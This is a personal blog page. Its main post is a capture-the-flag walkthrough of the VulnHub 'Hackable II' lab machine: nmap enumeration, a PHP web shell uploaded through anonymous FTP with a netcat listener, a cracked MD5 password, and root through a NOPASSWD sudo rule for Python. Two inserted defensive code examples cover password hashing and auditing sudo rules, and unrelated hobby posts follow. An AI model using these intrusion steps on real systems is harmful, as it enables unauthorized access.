Monday, July 26, 2021

CaptureTheFlag - Hackable II

I've recently regained interest in cyber security, so I have been practicing on some of the CTF machines available on VulnHub. I started with some easy machines, as it's been quite some time since I've played with any of this, so after doing a couple, using walkthroughs, I downloaded Hackable II and imported it into VirtualBox, and set the network up as "Internal" on the same network as my Kali VirtualBox.

The first thing I did was run nmap to discover the IP of the new host:
sudo nmap 10.38.1.1/24
This revealed several servers running on the box:
Nmap scan report for 10.38.1.7
Host is up (0.00036s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:B5:56:29 (Oracle VirtualBox virtual NIC)

Hmmm... ftp, ssh, and a web server... The web server has the default apache2 site, which doesn't reveal anything too interesting... Apache2 Ubuntu Default Page... Nothing too extraordinary. So, back to nmap:

sudo nmap --script http-enum.nse 10.38.1.7

This revealed a folder named /files/ on the web server. So, I look at it in a web browser and see a file listing. Then I attempt an anonymous ftp login to the server, and, sure enough, it's the same folder listing. Could they have allowed anonymous uploads? I have a short text file, temp.txt, for just such tests...

put temp.txt

Success! And, if I refresh the web browser, the file shows up. So, I delete that file, and upload a php web shell, which points to my kali box:

put shell.php 

And on my kali box:

nc -nlvp 1234

And then I refresh the page in Firefox and switch back to my netcat session and check to see what users are on this box... Interesting...

$ cd /home
$ ls -lta
total 16
drwxr-xr-x 4 shrek shrek 4096 Jul 26 21:13 shrek
drwxr-xr-x 23 root root 4096 Nov 26 2020 ..
drwxr-xr-x 3 root root 4096 Nov 26 2020 .
-rw-r--r-- 1 root root 43 Nov 26 2020 important.txt

One user, shrek, and hmmm...

$ cat important.txt
run the script to see the data

/.runme.sh

Yeah... Not gonna run that... But...

$ cat /.runme.sh
#!/bin/bash
echo 'the secret key'
sleep 2
echo 'is'
sleep 2
echo 'trolled'
sleep 2
echo 'restarting computer in 3 seconds...'
sleep 1
echo 'restarting computer in 2 seconds...'
sleep 1
echo 'restarting computer in 1 seconds...'
sleep 1
echo '⡴⠑⡄⠀⠀⠀⠀⠀⠀⠀ ⣀⣀⣤⣤⣤⣀⡀
⠸⡇⠀⠿⡀⠀⠀⠀⣀⡴⢿⣿⣿⣿⣿⣿⣿⣿⣷⣦⡀
⠀⠀⠀⠀⠑⢄⣠⠾⠁⣀⣄⡈⠙⣿⣿⣿⣿⣿⣿⣿⣿⣆
⠀⠀⠀⠀⢀⡀⠁⠀⠀⠈⠙⠛⠂⠈⣿⣿⣿⣿⣿⠿⡿⢿⣆
⠀⠀⠀⢀⡾⣁⣀⠀⠴⠂⠙⣗⡀⠀⢻⣿⣿⠭⢤⣴⣦⣤⣹⠀⠀⠀⢀⢴⣶⣆
⠀⠀⢀⣾⣿⣿⣿⣷⣮⣽⣾⣿⣥⣴⣿⣿⡿⢂⠔⢚⡿⢿⣿⣦⣴⣾⠸⣼⡿
⠀⢀⡞⠁⠙⠻⠿⠟⠉⠀⠛⢹⣿⣿⣿⣿⣿⣌⢤⣼⣿⣾⣿⡟⠉
⠀⣾⣷⣶⠇⠀⠀⣤⣄⣀⡀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
⠀⠉⠈⠉⠀⠀⢦⡈⢻⣿⣿⣿⣶⣶⣶⣶⣤⣽⡹⣿⣿⣿⣿⡇
⠀⠀⠀⠀⠀⠀⠀⠉⠲⣽⡻⢿⣿⣿⣿⣿⣿⣿⣷⣜⣿⣿⣿⡇
⠀⠀ ⠀⠀⠀⠀⠀⢸⣿⣿⣷⣶⣮⣭⣽⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⣀⣀⣈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
shrek:cf4c2232354952690368f1b3dfdfb24d'

So, off to https://crackstation.net/ and the password for shrek is, apparently, onion. This was also the title of the file listing page in the web browser. Clever clue ;) So... Kill the reverse shell, log in via ssh, and see what we can do with sudo...
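Why the lookup came back instantly: the credential in /.runme.sh is an unsalted MD5 of a dictionary word, which is exactly what a precomputed table answers in one hit. The following is an added example, not code from the post or the box: it rebuilds a tiny crackstation-style table from a constructed wordlist, then stores the same password with a random salt and an iterated KDF to show that the table no longer helps and every guess has to be re-derived at full cost.

```python
import hashlib
import os

# Constructed wordlist standing in for a precomputed table such as crackstation's.
WORDLIST = ["password", "shrek", "swamp", "onion", "donkey", "fiona"]
# The digest echoed by /.runme.sh on the box (from the post): unsalted MD5.
RECOVERED_HASH = "cf4c2232354952690368f1b3dfdfb24d"


def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()

def md5_table(wordlist):
    """Precompute digest -> word once; a lookup service is this at scale."""
    return {md5_hex(w): w for w in wordlist}

def lookup_md5(table, hex_digest):
    """One dictionary hit and no hashing at all: this is why an unsalted MD5
    of a common word comes back from a lookup service in milliseconds."""
    return table.get(hex_digest.lower())

def store_salted(password, salt=None, rounds=100_000):
    """How the credential should have been stored: PBKDF2-HMAC-SHA256 with a
    random per-record salt. Returns (salt, hex_digest)."""
    salt = os.urandom(16) if salt is None else salt
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds).hex()

def crack_salted(salt, hex_digest, wordlist, rounds=100_000):
    """No precomputed table helps here: each guess must be re-derived with this
    record's salt at full cost. Returns (word_or_None, guesses_made)."""
    for i, w in enumerate(wordlist, 1):
        if hashlib.pbkdf2_hmac("sha256", w.encode(), salt, rounds).hex() == hex_digest:
            return w, i
    return None, len(wordlist)

def demo():
    table = md5_table(WORDLIST)
    md5_hit = lookup_md5(table, RECOVERED_HASH)   # "onion", as crackstation reported
    salt, salted = store_salted("onion")
    table_hit = lookup_md5(table, salted)         # None: the salt defeats the table
    word, guesses = crack_salted(salt, salted, WORDLIST)
    return {"md5_hit": md5_hit, "table_hit": table_hit,
            "salted_word": word, "guesses": guesses}

if __name__ == "__main__":
    print(demo())
```

The salt only removes the shortcut; a password that is itself a dictionary word still falls to a per-guess search, so the KDF cost and the password strength have to do the rest.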

$ ssh shrek@10.38.1.7
shrek@10.38.1.7's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-194-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage


88 packages can be updated.
68 updates are security updates.


Last login: Mon Jul 26 21:09:32 2021 from 10.38.1.4
shrek@ubuntu:~$ sudo -l
Matching Defaults entries for shrek on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shrek may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/python3.5

Wait! What?! /usr/bin/python3.5 can be executed as root with no password?! Here's a quick and dirty sh.py:

root@ubuntu:~# cd /root
root@ubuntu:/root# ls -lta
total 32
-rw-------  1 root root   13 Jun 15 16:01 .bash_history
drw-------  4 root root 4096 Jun 15 13:35 .
-rw-------  1 root root 1581 Jun 15 13:28 root.txt
drwxr-xr-x 23 root root 4096 Nov 26  2020 ..
drw-------  2 root root 4096 Nov 25  2020 .cache
drw-------  2 root root 4096 Nov 25  2020 .nano
-rw-------  1 root root 3106 Oct 22  2015 .bashrc
-rw-------  1 root root  148 Aug 17  2015 .profile
root@ubuntu:/root# cat root.txt
                            ____
        ____....----''''````    |.
,'''````            ____....----; '.
| __....----''''````         .-.`'. '.
|.-.                .....    | |   '. '.
`| |        ..:::::::::::::::| |   .-;. |
 | |`'-;-::::::::::::::::::::| |,,.| |-='
 | |   | ::::::::::::::::::::| |   | |
 | |   | :::::::::::::::;;;;;| |   | |
 | |   | :::::::::;;;2KY2KY2Y| |   | |
 | |   | :::::;;Y2KY2KY2KY2KY| |   | |
 | |   | :::;Y2Y2KY2KY2KY2KY2| |   | |
 | |   | :;Y2KY2KY2KY2KY2K+++| |   | |
 | |   | |;2KY2KY2KY2++++++++| |   | |
 | |   | | ;++++++++++++++++;| |   | |
 | |   | |  ;++++++++++++++;.| |   | |
 | |   | |   :++++++++++++:  | |   | |
 | |   | |    .:++++++++;.   | |   | |
 | |   | |       .:;+:..     | |   | |
 | |   | |         ;;        | |   | |
 | |   | |      .,:+;:,.     | |   | |
 | |   | |    .::::;+::::,   | |   | |
 | |   | |   ::::::;;::::::. | |   | |
 | |   | |  :::::::+;:::::::.| |   | |
 | |   | | ::::::::;;::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | ::::::::;+++;:::::::| |   | |
 | |   | :::::::;+++++;::::::| |   | |
 | |   | ::::::;+++++++;:::::| |   | |
 | |   |.:::::;+++++++++;::::| |   | |
 | | ,`':::::;+++++++++++;:::| |'"-| |-..
 | |'   ::::;+++++++++++++;::| |   '-' ,|
 | |    ::::;++++++++++++++;:| |     .' |
,;-'_   `-._===++++++++++_.-'| |   .'  .'
|    ````'''----....___-'    '-' .'  .'
'---....____           ````'''--;  ,'
            ````''''----....____|.'

invite-me: https://www.linkedin.com/in/eliastouguinho/

And there it is! It took me longer to write this up than to get the root flag on this box. Next time, maybe something a little harder? ;)
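The sudo rule that handed over root on this box is worth catching before anyone logs in as shrek. Below is an added example, not code from the post: it parses `sudo -l` output of the shape shown above (a constructed sample modelled on that output) and flags NOPASSWD rules that run an interpreter, editor or pager as root, normalising versioned names such as python3.5. The RISKY set is my own shortlist, not an exhaustive one.

```python
import re
import shlex

# Programs that turn a NOPASSWD root rule into an unrestricted root shell;
# the post's /usr/bin/python3.5 is the textbook case (shortlist, not exhaustive).
RISKY = {"python", "perl", "ruby", "php", "node", "sh", "bash", "dash",
         "vim", "vi", "nano", "less", "more", "find", "awk"}

# Constructed sample modelled on the `sudo -l` output in the post.
SAMPLE_SUDO_L = """\
Matching Defaults entries for shrek on ubuntu:
    env_reset, mail_badpass

User shrek may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/python3.5
    (root) /usr/bin/apt-get update
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl restart nginx
"""

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(text):
    """Return (runas, tags, command) triples from `sudo -l` output."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), tags, cmd.strip()))
    return rules

def risky_rules(rules):
    """Rules usable as root (explicit or ALL) without a password whose program
    can spawn a shell; version suffixes like python3.5 are normalised."""
    hits = []
    for runas, tags, cmd in rules:
        user = runas.split(":")[0].strip()
        if "NOPASSWD" not in tags or user not in ("root", "ALL"):
            continue
        prog = shlex.split(cmd)[0].rsplit("/", 1)[-1]
        if re.sub(r"[\d.]+$", "", prog) in RISKY:
            hits.append((runas, cmd))
    return hits

if __name__ == "__main__":
    print(risky_rules(parse_sudo_l(SAMPLE_SUDO_L)))
```

Run it against the real output of `sudo -l -U <user>` from a host audit; the fix for a hit is to replace the blanket interpreter entry with a wrapper script that takes no arguments, or to drop NOPASSWD.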

Monday, June 7, 2021

Flying High Again

Something I've always wanted to do, since I was a child, is to become a pilot. My wife bought me an incredible package to start me on that journey, and so far I have 2.5 hrs and three landings in a C172, and .8hr and one landing in a CTLS Light-sport. I much prefer the C172 ;) I've also taken a complete ground school and earned my endorsement to take the FAA written exam. I'll probably take an FAA medical exam soon, and will continue to practice for the FAA written, until I'm a little more confident. I mean, I'm sure I can pass it, but higher scores might make a difference on the oral exam before the checkride ;) It may be a small start, but it is enough for me to get the bug for flying ;) Since my flights so far have been "discovery" flights, I still need to decide on a flight school. I prefer the one where I have the time in the Cessna, but it is so far away compared to the other. I still need to check out the one in Fairfield County, and the one at Bolton Field... Looking for the same connection with the instructor as the one I've been using at Middletown...

Friday, June 4, 2021

BBS Projects

Wow! It's been way too long since my last post, but here are updates on a couple of recent projects: I have obtained an 8-port Digiboard, and plan on installing it into either one of my Tandy 1000SXs, or, if there are too many memory constraints, a Compaq 386 that I acquired awhile back, and setting up an 8-line DLX BBS on it. I don't expect a simple 8-line chat board to get much use these days, but, I really want to try it ;) I'll be using a Raspberry Pi 4 and tcpser, along with 8 USB serial ports, as multiple WiFi modems. I also received my CoCo SDC for my Tandy CoCo 2, and plan on FINALLY finishing a project I started in 2008 to get CoBBS going. The big difference now is I will be using a CoCo 2 instead of a CoCo 3, which is what it was originally written for, and I have many more options for a modem emulator. I am most likely to use an esp32 set up as a WiFi modem. Finally, I have a WWiV board running under Linux, but "languishing" is probably a better term. I would much rather run an old 4.22 board than a current 5.x board, and have been considering figuring out how to get the current networking package working with the old BBS package. Once I do that, I'm considering also setting up a VBBS 6.x board, and I prefer that over 7 or VA. I also have an Apple2e and a C64 sitting idle. I might set up BBS packages on them as well. Time is at a bit of a premium, though, as I am doing some pilot ground school and training to become a private pilot.

Wednesday, March 31, 2021

Vaccine round one

I got round one of the Moderna Covid-19 vaccine yesterday morning, and aside from some soreness and tenderness at the injection site, which started a couple of hours after the shot, there haven't been any side effects. From what I hear, it's the second round that usually has the side effects, so I'll update in a few weeks after I've had it...

Wednesday, February 17, 2021

Farewell, LastPass!

I have been using the free tier of Lastpass for some time now, but in their infinite wisdom, they have decided to restrict the free tier to a single type of device. This means I can either use it in a browser on my desktop, or on my Android phone, but not both. Ability to easily sync across devices and browsers is what gave LastPass a leg up, and what made me settle on it in the first place. It looks like Bitwarden is the new winner of that contest. Installed it in Chrome and on my phone, and working well so far.